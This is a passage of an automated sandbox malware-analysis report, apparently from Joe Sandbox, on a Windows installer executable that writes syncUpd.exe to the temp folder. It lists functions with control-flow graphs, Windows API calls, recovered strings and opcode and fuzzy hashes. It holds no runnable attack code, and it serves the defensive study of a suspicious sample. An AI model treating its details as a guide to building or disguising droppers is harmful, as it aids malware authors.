199 406287-406294 GetFileAttributesA 195->199 196->167 203 406296-406298 199->203 204 40629a-4062a2 call 4078ce 199->204 213 406541-406548 call 403903 201->213 214 406524-40652b 201->214 215 406464-406488 GetClassInfoA 202->215 216 406457-406463 call 40820e 202->216 203->196 203->204 204->196 224 40654d 213->224 214->190 217 40652d-406539 call 403903 214->217 220 40648a-4064bd GetClassInfoA RegisterClassA 215->220 221 4064be-406511 DialogBoxParamA call 403903 call 4049b4 215->221 216->215 217->190 220->221 221->224 224->189
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00408299: GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
                                                                                                                                                                                                                                                                • Part of subcall function 00408299: GetProcAddress.KERNEL32 ref: 004082DA
                                                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32 ref: 0040627B
                                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32 ref: 0040628A
                                                                                                                                                                                                                                                                • Part of subcall function 00407BE3: wsprintfA.USER32 ref: 00407BFE
                                                                                                                                                                                                                                                              • LoadImageA.USER32(?,?,00000000,00000000), ref: 00406317
                                                                                                                                                                                                                                                              • RegisterClassA.USER32 ref: 00406361
                                                                                                                                                                                                                                                              • SystemParametersInfoA.USER32 ref: 00406392
                                                                                                                                                                                                                                                              • CreateWindowExA.USER32 ref: 004063F7
                                                                                                                                                                                                                                                              • ShowWindow.USER32 ref: 0040643E
                                                                                                                                                                                                                                                              • GetClassInfoA.USER32(?,00000000), ref: 00406481
                                                                                                                                                                                                                                                              • GetClassInfoA.USER32 ref: 004064A1
                                                                                                                                                                                                                                                              • RegisterClassA.USER32 ref: 004064B7
                                                                                                                                                                                                                                                              • DialogBoxParamA.USER32 ref: 004064ED
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcmpiwsprintf
                                                                                                                                                                                                                                                              • String ID: @Vl$Error opening file for writing: C:\Users\user\AppData\Local\Temp\syncUpd.exeClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.$_Nb$g
                                                                                                                                                                                                                                                              • API String ID: 3995538257-3487636860
                                                                                                                                                                                                                                                              • Opcode ID: 2f233f64265ed054fe4a50ef783cb1e0c7b699e5a95c035f069f719471a29138
                                                                                                                                                                                                                                                              • Instruction ID: 933614cd0025173359140365b9e7a590c615df7829bf1f80af9a09b402b61920
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f233f64265ed054fe4a50ef783cb1e0c7b699e5a95c035f069f719471a29138
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75B10AB05083019FE710AF65D94872BBBE4EF44308F41892EE4D597391D7BC9895CB9A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00403F03 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 216memoryfileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 230 403f03-403f6d GetTickCount GetModuleFileNameA call 407a78 233 4042b1-4042b8 230->233 234 403f73-403fc4 call 407cb6 call 4078ce call 407cb6 GetFileSize 230->234 241 403fce-403fd0 234->241 242 4040c3-4040d6 call 4039fe 241->242 243 403fd6-403ffb call 403ae9 241->243 250 4040d8 242->250 251 40412d-40413a 242->251 246 404000-404004 243->246 248 404006-404012 call 4039fe 246->248 249 404017-40401e 246->249 257 404168-40416d 248->257 252 404024-404050 call 407a23 249->252 253 4040ed-4040f1 249->253 250->257 254 404172-4041f0 GlobalAlloc call 408904 call 407ad4 CreateFileA 251->254 255 40413c-404144 call 403b31 251->255 259 4040ff-404105 252->259 271 404056-404060 252->271 258 4040f3-4040fa call 4039fe 253->258 253->259 254->233 278 4041f6-40424b call 403b31 call 403d52 254->278 269 404149-40415e call 403ae9 255->269 257->233 258->259 267 404120-404128 259->267 268 404107-40411e call 408898 259->268 267->241 268->267 269->257 280 404160-404166 269->280 271->259 275 404066-404070 271->275 275->259 279 404076-404080 275->279 287 404250-404259 278->287 279->259 282 404082-40408c 279->282 280->254 280->257 282->259 284 40408e-4040b1 282->284 284->257 286 4040b7-4040bb 284->286 288 4040dd-4040eb 286->288 289 4040bd-4040c1 286->289 287->257 290 40425f-404273 287->290 288->259 289->242 289->288 291 404275 290->291 292 40427b 290->292 291->292 293 404280-404281 292->293 294 404283-404287 293->294 295 404289-4042ae call 407a23 293->295 294->293 295->233
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403F0F
                                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32 ref: 00403F36
                                                                                                                                                                                                                                                                • Part of subcall function 00407A78: GetFileAttributesA.KERNELBASE ref: 00407A85
                                                                                                                                                                                                                                                                • Part of subcall function 00407A78: CreateFileA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00000000,?,00403F5B), ref: 00407AC4
                                                                                                                                                                                                                                                                • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
                                                                                                                                                                                                                                                                • Part of subcall function 004078CE: lstrlenA.KERNEL32 ref: 004078DB
                                                                                                                                                                                                                                                                • Part of subcall function 004078CE: CharPrevA.USER32 ref: 004078F0
                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,75923160), ref: 00403FB5
                                                                                                                                                                                                                                                                • Part of subcall function 00403AE9: ReadFile.KERNELBASE ref: 00403B15
                                                                                                                                                                                                                                                              • GlobalAlloc.KERNELBASE ref: 00404183
                                                                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00000000,00000000), ref: 004041DC
                                                                                                                                                                                                                                                                • Part of subcall function 004039FE: DestroyWindow.USER32 ref: 00403A17
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • Inst, xrefs: 00404066
                                                                                                                                                                                                                                                              • lWl, xrefs: 004042A0
                                                                                                                                                                                                                                                              • Error launching installer, xrefs: 00403F68
                                                                                                                                                                                                                                                              • @, xrefs: 00404294
                                                                                                                                                                                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004041EB
                                                                                                                                                                                                                                                              • @Vl, xrefs: 00404266
                                                                                                                                                                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00404168
                                                                                                                                                                                                                                                              • soft, xrefs: 00404076
                                                                                                                                                                                                                                                              • Null, xrefs: 00404082
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$Create$AllocAttributesCharCountDestroyGlobalModuleNamePrevReadSizeTickWindowlstrcpynlstrlen
                                                                                                                                                                                                                                                              • String ID: @$@Vl$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$lWl$soft
                                                                                                                                                                                                                                                              • API String ID: 3119619987-1405107949
                                                                                                                                                                                                                                                              • Opcode ID: 86ceb0f55910d5bee0ed91d50a485dda6c60a6ff79fcc7ad8f2db1f11ee4e7d1
                                                                                                                                                                                                                                                              • Instruction ID: b38f96b7e78b57fcd3b2806388120572df800b880dbb1f433db2e5bcd9a6e09c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86ceb0f55910d5bee0ed91d50a485dda6c60a6ff79fcc7ad8f2db1f11ee4e7d1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1791A4B09083048FD720AF29D98576EBBF4EF84318F41847EE584A7291D77C9985CF9A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00401B0D Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 184timeCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CompareFileTime.KERNEL32(?,00000000), ref: 00401BA1
                                                                                                                                                                                                                                                                • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
                                                                                                                                                                                                                                                                • Part of subcall function 00407836: MessageBoxIndirectA.USER32 ref: 00407899
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SetWindowTextA.USER32 ref: 00407061
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070A1
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070CF
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070EE
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Message$Send$CompareFileIndirectTextTimeWindowlstrcpyn
                                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\syncUpd.exe$Error opening file for writing: C:\Users\user\AppData\Local\Temp\syncUpd.exeClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.
                                                                                                                                                                                                                                                              • API String ID: 645384303-1569426528
                                                                                                                                                                                                                                                              • Opcode ID: 39f1cc7eb277374050ac61fcdd2f2c3b11c7e06bae893a1bc1b2b4b0adb3845a
                                                                                                                                                                                                                                                              • Instruction ID: 5f2d288321653f80e71b8b11b89773680788b89a4638a57d45da6de8162f07b1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39f1cc7eb277374050ac61fcdd2f2c3b11c7e06bae893a1bc1b2b4b0adb3845a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA6141B09087009FD710BF65CA45A6FBAF8EF80714F118A2FF485A7291D77C58918B6B
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00403D52 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 383 403d52-403d60 384 403d92-403da3 call 403b63 383->384 385 403d62-403d8f SetFilePointer 383->385 388 403ef7-403f00 384->388 389 403da9-403ddc ReadFile 384->389 385->384 390 403de2-403de6 389->390 391 403ea8-403ead 389->391 390->391 392 403dec-403e05 call 403b63 390->392 391->388 392->388 395 403e0b-403e0f 392->395 396 403e15-403e18 395->396 397 403eba-403eec ReadFile 395->397 399 403e64-403e69 396->399 397->391 398 403eee-403ef1 397->398 398->388 400 403eb6-403eb8 399->400 401 403e6b-403ea2 399->401 400->388 401->391 403 403e1a-403e1d 401->403 403->391 404 403e23-403e4f WriteFile 403->404 405 403e51-403e54 404->405 406 403eaf-403eb4 404->406 405->406 407 403e56-403e62 405->407 406->388 407->399
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$Read$PointerWrite
                                                                                                                                                                                                                                                              • String ID: PB@
                                                                                                                                                                                                                                                              • API String ID: 2113905535-661560245
                                                                                                                                                                                                                                                              • Opcode ID: ac68a1f51fa2d24e3935b3f5087da11d05715ce400863ada3ca60dca7cc7719e
                                                                                                                                                                                                                                                              • Instruction ID: 6b6e275f29c4804299ca632934389f045b276b78e87a5faa28d99019ded5aa05
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac68a1f51fa2d24e3935b3f5087da11d05715ce400863ada3ca60dca7cc7719e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC41FAB0A043059FDB10DF69C98479EBBF4FF84355F50893AE854A3290D378D9458B9A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00403B63 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115fileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 408 403b63-403b8d GetTickCount 409 403b93-403be0 call 403b31 SetFilePointer 408->409 410 403d35-403d43 call 4039fe 408->410 416 403be3-403c11 call 403ae9 409->416 415 403d48-403d4f 410->415 419 403d45 416->419 420 403c17-403c27 416->420 419->415 421 403c2d-403c34 420->421 422 403c36-403c3d 421->422 423 403c68-403c88 call 40893d 421->423 422->423 424 403c3f-403c63 call 4039fe 422->424 428 403c8a-403c96 423->428 429 403cec-403cf1 423->429 424->423 430 403c98-403cc3 WriteFile 428->430 431 403cdf-403ce6 428->431 429->415 432 403cf3-403cf8 430->432 433 403cc5-403cc8 430->433 431->429 434 403ce8-403cea 431->434 432->415 433->432 436 403cca-403cd7 433->436 434->429 435 403cfa-403d0d 434->435 435->416 437 403d13-403d32 SetFilePointer 435->437 436->421 438 403cdd 436->438 437->410 438->435
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403B7B
                                                                                                                                                                                                                                                                • Part of subcall function 00403B31: SetFilePointer.KERNELBASE ref: 00403B56
                                                                                                                                                                                                                                                              • SetFilePointer.KERNELBASE ref: 00403BCB
                                                                                                                                                                                                                                                                • Part of subcall function 00403AE9: ReadFile.KERNELBASE ref: 00403B15
                                                                                                                                                                                                                                                              • WriteFile.KERNELBASE ref: 00403CB8
                                                                                                                                                                                                                                                              • SetFilePointer.KERNELBASE ref: 00403D2F
                                                                                                                                                                                                                                                                • Part of subcall function 004039FE: DestroyWindow.USER32 ref: 00403A17
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$Pointer$CountDestroyReadTickWindowWrite
                                                                                                                                                                                                                                                              • String ID: @Vl
                                                                                                                                                                                                                                                              • API String ID: 1725291646-658408307
                                                                                                                                                                                                                                                              • Opcode ID: 18ae4545f5b30c3c28caf4f3d11ae2cad8807af871cef0b76668dc3cb6943506
                                                                                                                                                                                                                                                              • Instruction ID: f7083fb0e86bb6005b9bf14dc6a8331a2f5849a6e81c63e88d49bae7df8a1a75
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18ae4545f5b30c3c28caf4f3d11ae2cad8807af871cef0b76668dc3cb6943506
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D3514AB1A183049FD720DF29E88532A7BB4FF44355F90893EE844A72A0D7789546CF9E
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040820E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 439 40820e-40823a GetSystemDirectoryA 440 40824b-40824d 439->440 441 40823c-408249 439->441 442 408252-408296 wsprintfA LoadLibraryExA 440->442 441->442
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                                                              • String ID: \$C@
                                                                                                                                                                                                                                                              • API String ID: 2200240437-1790911818
                                                                                                                                                                                                                                                              • Opcode ID: c9660503d559c2df304355e59e8a4c4b93ddf83edb93a1dccef26b9b85dfc474
                                                                                                                                                                                                                                                              • Instruction ID: 6c0f10e39fe67b0a46f2467a814b7d530fefee384e0f0f9ebaf92f9caf306ff0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9660503d559c2df304355e59e8a4c4b93ddf83edb93a1dccef26b9b85dfc474
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D014BB1508704AFD300EF68D98879EBBF4FB84308F54C83DD08996295D7789589CB5A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00408299 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 31libraryloaderCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 443 408299-4082b9 GetModuleHandleA 444 4082bb-4082be call 40820e 443->444 445 4082cc-4082e1 GetProcAddress 443->445 448 4082c3-4082ca 444->448 446 4082e2-4082e8 445->446 448->445 448->446
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004082DA
                                                                                                                                                                                                                                                                • Part of subcall function 0040820E: GetSystemDirectoryA.KERNEL32 ref: 00408229
                                                                                                                                                                                                                                                                • Part of subcall function 0040820E: wsprintfA.USER32 ref: 00408270
                                                                                                                                                                                                                                                                • Part of subcall function 0040820E: LoadLibraryExA.KERNELBASE ref: 00408289
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                                                              • String ID: UXTHEME$C@$C@
                                                                                                                                                                                                                                                              • API String ID: 2547128583-1808485004
                                                                                                                                                                                                                                                              • Opcode ID: f6ce91f65d8d9bb7ee18f4d542f9107f4d6a72ffda61794c9569e264c57c3d17
                                                                                                                                                                                                                                                              • Instruction ID: 23c7ce911dd590b504e17f07e60dbba2231cf2c7d4590c8d4e2d2ec4458658d6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6ce91f65d8d9bb7ee18f4d542f9107f4d6a72ffda61794c9569e264c57c3d17
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AF08275A00A089BD710AF65D98446FBBF8FB88750B01C47DF98493324EA3499608B9A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00408D43 Relevance: 5.5, APIs: 4, Instructions: 458memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
